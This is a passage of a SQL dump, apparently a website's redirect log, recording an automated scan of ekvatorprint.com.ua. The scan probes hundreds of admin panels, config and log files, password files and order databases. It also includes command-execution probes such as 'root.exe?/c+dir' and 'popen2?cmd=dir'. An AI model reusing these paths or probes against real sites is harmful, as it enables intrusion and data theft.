00:00:00',301),(7479,'http://ekvatorprint.com.ua/modelsearch/admin.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7480,'http://ekvatorprint.com.ua/modcp',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7481,'http://ekvatorprint.com.ua/modelsearch/admin.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7482,'http://ekvatorprint.com.ua/modelsearch/index.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7483,'http://ekvatorprint.com.ua/modelsearch/index.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7484,'http://ekvatorprint.com.ua/modelsearch/index.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7485,'http://ekvatorprint.com.ua/modelsearch/login.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7486,'http://ekvatorprint.com.ua/modelsearch/login.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7487,'http://ekvatorprint.com.ua/modelsearch/login.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7488,'http://ekvatorprint.com.ua/moderator.php',NULL,'','',2,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7489,'http://ekvatorprint.com.ua/moderator.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7490,'http://ekvatorprint.com.ua/moderator.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7491,'http://ekvatorprint.com.ua/moderator/',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7492,'http://ekvatorprint.com.ua/moderator/admin.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7493,'http://ekvatorprint.com.ua/moderator/admin.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7494,'http://ekvatorprint.com.ua/moderator/admin.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7495,'http://ekvatorprint.com.ua/moderator/login.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7496,'http://ekvatorprint.com.ua/moderator/login.',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7497,'http://ekvatorprint.com.ua/moderator/login.html',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7498,'http://ekvatorprint.com.ua/mh_admin',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7499,'http://ekvatorprint.com.ua/modules/TinyMCE/TinyMCEModuleInfo.php',NULL,'','',1,0,'2017-01-20 13:28:49','0000-00-00 00:00:00',301),(7500,'http://ekvatorprint.com.ua/module/tinymce',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7501,'http://ekvatorprint.com.ua/modules/web.config',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7502,'http://ekvatorprint.com.ua/moinmail',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7503,'http://ekvatorprint.com.ua/mmadmin',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7504,'http://ekvatorprint.com.ua/monitor/',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7505,'http://ekvatorprint.com.ua/module/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7506,'http://ekvatorprint.com.ua/modules/TinyMCE/TinyMCEModuleInfo.',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7507,'http://ekvatorprint.com.ua/modules_admin',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7508,'http://ekvatorprint.com.ua/mp3',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7509,'http://ekvatorprint.com.ua/moodle',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7510,'http://ekvatorprint.com.ua/more',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7511,'http://ekvatorprint.com.ua/movies',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7512,'http://ekvatorprint.com.ua/msadc/Samples/selector/showcode.php',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7513,'http://ekvatorprint.com.ua/msdac/root.exe?/c+dir',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7514,'http://ekvatorprint.com.ua/ms-admin',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7515,'http://ekvatorprint.com.ua/mspress30',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7516,'http://ekvatorprint.com.ua/msadc/Samples/selector/showcode.',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7517,'http://ekvatorprint.com.ua/msadc/',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7518,'http://ekvatorprint.com.ua/mrtg.cfg',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7519,'http://ekvatorprint.com.ua/msql',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7520,'http://ekvatorprint.com.ua/mp_admin',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7521,'http://ekvatorprint.com.ua/monitoring/',NULL,'','',1,0,'2017-01-20 13:28:50','0000-00-00 00:00:00',301),(7522,'http://ekvatorprint.com.ua/msql/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7523,'http://ekvatorprint.com.ua/mssql',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7524,'http://ekvatorprint.com.ua/mt',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7525,'http://ekvatorprint.com.ua/mssql/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7526,'http://ekvatorprint.com.ua/muracms.esproj',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7527,'http://ekvatorprint.com.ua/munin',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7528,'http://ekvatorprint.com.ua/multimedia',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7529,'http://ekvatorprint.com.ua/mutillidae/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7530,'http://ekvatorprint.com.ua/munin/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7531,'http://ekvatorprint.com.ua/music',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7532,'http://ekvatorprint.com.ua/mw-config/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7533,'http://ekvatorprint.com.ua/mwaextraadmin4',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7534,'http://ekvatorprint.com.ua/my-admin',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7535,'http://ekvatorprint.com.ua/my_admin',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7536,'http://ekvatorprint.com.ua/myadm/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7537,'http://ekvatorprint.com.ua/myaccount.php',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7538,'http://ekvatorprint.com.ua/myaccount.',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7539,'http://ekvatorprint.com.ua/myadmin',NULL,'','',2,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7540,'http://ekvatorprint.com.ua/myadmin/index.php',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7541,'http://ekvatorprint.com.ua/myadminphp',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7542,'http://ekvatorprint.com.ua/myadmin/',NULL,'','',2,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7543,'http://ekvatorprint.com.ua/myadminbreeze',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7544,'http://ekvatorprint.com.ua/myadminscripts/setup.php',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7545,'http://ekvatorprint.com.ua/myconfigs/',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7546,'http://ekvatorprint.com.ua/myblog-admin',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7547,'http://ekvatorprint.com.ua/myadmin/scripts/setup.php',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7548,'http://ekvatorprint.com.ua/mygacportadmin',NULL,'','',1,0,'2017-01-20 13:28:51','0000-00-00 00:00:00',301),(7549,'http://ekvatorprint.com.ua/mt-check.cgi',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7550,'http://ekvatorprint.com.ua/myazadmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7551,'http://ekvatorprint.com.ua/mysql',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7552,'http://ekvatorprint.com.ua/myservlet',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7553,'http://ekvatorprint.com.ua/myphpadmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7554,'http://ekvatorprint.com.ua/mydomain',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7555,'http://ekvatorprint.com.ua/mysql-admin/',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7556,'http://ekvatorprint.com.ua/mysql-admin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7557,'http://ekvatorprint.com.ua/mysql.err',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7558,'http://ekvatorprint.com.ua/mysql/',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7559,'http://ekvatorprint.com.ua/mysql/scripts/setup.php',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7560,'http://ekvatorprint.com.ua/mysqladmin/scripts/setup.php',NULL,'','',2,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7561,'http://ekvatorprint.com.ua/mysql_admin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7562,'http://ekvatorprint.com.ua/mysqladmin/',NULL,'','',2,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7563,'http://ekvatorprint.com.ua/mysql_debug.sql',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7564,'http://ekvatorprint.com.ua/mysqladmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7565,'http://ekvatorprint.com.ua/mysqlitedb.db',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7566,'http://ekvatorprint.com.ua/mysqlmanager/',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7567,'http://ekvatorprint.com.ua/n',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7568,'http://ekvatorprint.com.ua/nadmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7569,'http://ekvatorprint.com.ua/nagios',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7570,'http://ekvatorprint.com.ua/nb-configuration.xml',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7571,'http://ekvatorprint.com.ua/nav',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7572,'http://ekvatorprint.com.ua/nano.save',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7573,'http://ekvatorprint.com.ua/nbproject/private/private.properties',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7574,'http://ekvatorprint.com.ua/nbproject/',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7575,'http://ekvatorprint.com.ua/nbactions.xml',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7576,'http://ekvatorprint.com.ua/nbproject/private/private.xml',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7577,'http://ekvatorprint.com.ua/nbproject/project.properties',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7578,'http://ekvatorprint.com.ua/ncadmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7579,'http://ekvatorprint.com.ua/nbproject/project.xml',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7580,'http://ekvatorprint.com.ua/netadmin',NULL,'','',1,0,'2017-01-20 13:28:52','0000-00-00 00:00:00',301),(7581,'http://ekvatorprint.com.ua/netadmin.php',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7582,'http://ekvatorprint.com.ua/netadmin.',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7583,'http://ekvatorprint.com.ua/netadmin.htm',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7584,'http://ekvatorprint.com.ua/netadmin.html',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7585,'http://ekvatorprint.com.ua/netadmin.jsp',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7586,'http://ekvatorprint.com.ua/netadmin.shtml',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7587,'http://ekvatorprint.com.ua/mysql.log',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7588,'http://ekvatorprint.com.ua/network',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7589,'http://ekvatorprint.com.ua/new_admin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7590,'http://ekvatorprint.com.ua/new.php',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7591,'http://ekvatorprint.com.ua/news-admin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7592,'http://ekvatorprint.com.ua/newadmin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7593,'http://ekvatorprint.com.ua/news',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7594,'http://ekvatorprint.com.ua/news.',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7595,'http://ekvatorprint.com.ua/news_admin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7596,'http://ekvatorprint.com.ua/news_admin.',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7597,'http://ekvatorprint.com.ua/news_admin.php',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7598,'http://ekvatorprint.com.ua/mysqldumper/',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7599,'http://ekvatorprint.com.ua/newsadmin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7600,'http://ekvatorprint.com.ua/newsletter',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7601,'http://ekvatorprint.com.ua/newsletteradmin',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7602,'http://ekvatorprint.com.ua/newsletter/',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7603,'http://ekvatorprint.com.ua/nginx-access.log',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7604,'http://ekvatorprint.com.ua/nginx-error.log',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7605,'http://ekvatorprint.com.ua/nginx-ssl.access.log',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7606,'http://ekvatorprint.com.ua/nginx-status/',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7607,'http://ekvatorprint.com.ua/nginx-ssl.error.log',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7608,'http://ekvatorprint.com.ua/nginx.conf',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7609,'http://ekvatorprint.com.ua/nginx_status',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7610,'http://ekvatorprint.com.ua/nl',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7611,'http://ekvatorprint.com.ua/nimda/',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7612,'http://ekvatorprint.com.ua/node',NULL,'','',1,0,'2017-01-20 13:28:53','0000-00-00 00:00:00',301),(7613,'http://ekvatorprint.com.ua/nodes',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7614,'http://ekvatorprint.com.ua/node.xml',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7615,'http://ekvatorprint.com.ua/nohup.out',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7616,'http://ekvatorprint.com.ua/npm-debug.log',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7617,'http://ekvatorprint.com.ua/nsw/admin/login.php',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7618,'http://ekvatorprint.com.ua/nst.php',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7619,'http://ekvatorprint.com.ua/nstview.php',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7620,'http://ekvatorprint.com.ua/new',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7621,'http://ekvatorprint.com.ua/ntadmin',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7622,'http://ekvatorprint.com.ua/nsw/admin/login.',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7623,'http://ekvatorprint.com.ua/nucleus/documentation/history.html',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7624,'http://ekvatorprint.com.ua/nwadmin',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7625,'http://ekvatorprint.com.ua/nusoap',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7626,'http://ekvatorprint.com.ua/null.htw',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7627,'http://ekvatorprint.com.ua/nwp-content/plugins/disqus-comment-system/disqus.php',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7628,'http://ekvatorprint.com.ua/oauth',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7629,'http://ekvatorprint.com.ua/o',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7630,'http://ekvatorprint.com.ua/oauth.',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7631,'http://ekvatorprint.com.ua/newsletters',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7632,'http://ekvatorprint.com.ua/oauth/login/',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7633,'http://ekvatorprint.com.ua/newsletter-admin',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7634,'http://ekvatorprint.com.ua/oauth/signin/',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7635,'http://ekvatorprint.com.ua/objects',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7636,'http://ekvatorprint.com.ua/odbc',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7637,'http://ekvatorprint.com.ua/ojspdemos',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7638,'http://ekvatorprint.com.ua/olap/',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7639,'http://ekvatorprint.com.ua/old',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7640,'http://ekvatorprint.com.ua/old.htaccess',NULL,'','',1,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7641,'http://ekvatorprint.com.ua/old.htpasswd',NULL,'','',2,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7642,'http://ekvatorprint.com.ua/old/',NULL,'','',4,0,'2017-01-20 13:28:54','0000-00-00 00:00:00',301),(7643,'http://ekvatorprint.com.ua/old_admin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7644,'http://ekvatorprint.com.ua/old_site/',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7645,'http://ekvatorprint.com.ua/old_files',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7646,'http://ekvatorprint.com.ua/oldadmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7647,'http://ekvatorprint.com.ua/online',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7648,'http://ekvatorprint.com.ua/oldfiles',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7649,'http://ekvatorprint.com.ua/onlineadmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7650,'http://ekvatorprint.com.ua/oneadmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7651,'http://ekvatorprint.com.ua/opadmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7652,'http://ekvatorprint.com.ua/opc/',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7653,'http://ekvatorprint.com.ua/opc/services/BrokerServiceIntfPort/wsdl/',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7654,'http://ekvatorprint.com.ua/opc/services/BrokerServiceIntfPort',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7655,'http://ekvatorprint.com.ua/opc/services/PurchaseOrderIntfPort/wsdl/',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7656,'http://ekvatorprint.com.ua/oauth.php',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7657,'http://ekvatorprint.com.ua/opc/services/OrderTrackingIntfPort/wsdl/',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7658,'http://ekvatorprint.com.ua/opc/services/PurchaseOrderIntfPort',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7659,'http://ekvatorprint.com.ua/opc/services/OrderTrackingIntfPort',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7660,'http://ekvatorprint.com.ua/opinion',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7661,'http://ekvatorprint.com.ua/openadmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7662,'http://ekvatorprint.com.ua/oladmin',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7663,'http://ekvatorprint.com.ua/opt',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7664,'http://ekvatorprint.com.ua/orasso',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7665,'http://ekvatorprint.com.ua/order.htm',NULL,'','',1,0,'2017-01-20 13:28:55','0000-00-00 00:00:00',301),(7666,'http://ekvatorprint.com.ua/order_add_log.txt',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7667,'http://ekvatorprint.com.ua/order.txt',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7668,'http://ekvatorprint.com.ua/order.log',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7669,'http://ekvatorprint.com.ua/order_admin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7670,'http://ekvatorprint.com.ua/order_log',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7671,'http://ekvatorprint.com.ua/orders',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7672,'http://ekvatorprint.com.ua/orders.csv',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7673,'http://ekvatorprint.com.ua/orders.log',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7674,'http://ekvatorprint.com.ua/orders.sql',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7675,'http://ekvatorprint.com.ua/os-admin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7676,'http://ekvatorprint.com.ua/orders.sql.gz',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7677,'http://ekvatorprint.com.ua/orders.txt',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7678,'http://ekvatorprint.com.ua/orders.xls',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7679,'http://ekvatorprint.com.ua/orders_log',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7680,'http://ekvatorprint.com.ua/osCadmin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7681,'http://ekvatorprint.com.ua/os_admin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7682,'http://ekvatorprint.com.ua/osadmin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7683,'http://ekvatorprint.com.ua/oscommerce',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7684,'http://ekvatorprint.com.ua/ospfd.conf',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7685,'http://ekvatorprint.com.ua/output-build.txt',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7686,'http://ekvatorprint.com.ua/other',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7687,'http://ekvatorprint.com.ua/out.cgi',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7688,'http://ekvatorprint.com.ua/overview',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7689,'http://ekvatorprint.com.ua/owa',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7690,'http://ekvatorprint.com.ua/owfadmin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7691,'http://ekvatorprint.com.ua/oxebiz_admin',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7692,'http://ekvatorprint.com.ua/oracle',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7693,'http://ekvatorprint.com.ua/p/m/a/',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7694,'http://ekvatorprint.com.ua/p',NULL,'','',3,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7695,'http://ekvatorprint.com.ua/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7696,'http://ekvatorprint.com.ua/order',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7697,'http://ekvatorprint.com.ua/p.php',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7698,'http://ekvatorprint.com.ua/package',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7699,'http://ekvatorprint.com.ua/pages/admin/admin-login.php',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7700,'http://ekvatorprint.com.ua/page',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7701,'http://ekvatorprint.com.ua/pages',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 